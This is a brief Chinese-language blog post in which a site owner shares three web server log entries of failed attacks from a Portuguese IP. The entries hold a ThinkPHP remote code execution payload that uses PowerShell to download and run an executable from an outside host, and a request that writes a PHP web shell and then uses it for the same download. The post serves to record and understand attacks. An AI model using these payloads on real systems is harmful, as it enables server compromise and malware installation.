跟之前類似的東西, 只是稍微變化一下, 同樣手法去下載執行檔然後自動執行, 不了解第一個與第三個攻擊的意義(使用不同的php檔?), 來自葡萄牙的傢伙
87.103.14.199 - - [17/Jun/2019:23:22:01 +0800] "GET /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe');start%20%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe HTTP/1.1" 404 214 "http://www.w-studio.idv.tw/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe');start %SystemRoot%/Temp/xfxrucjwcznptjk12592.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
87.103.14.199 - - [17/Jun/2019:23:22:01 +0800] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 404 214 "http://www.w-studio.idv.tw/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
87.103.14.199 - - [17/Jun/2019:23:22:02 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe');start%20%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe HTTP/1.1" 404 214 "http://www.w-studio.idv.tw/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/xfxrucjwcznptjk12592.exe');start %SystemRoot%/Temp/xfxrucjwcznptjk12592.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
沒有留言:
張貼留言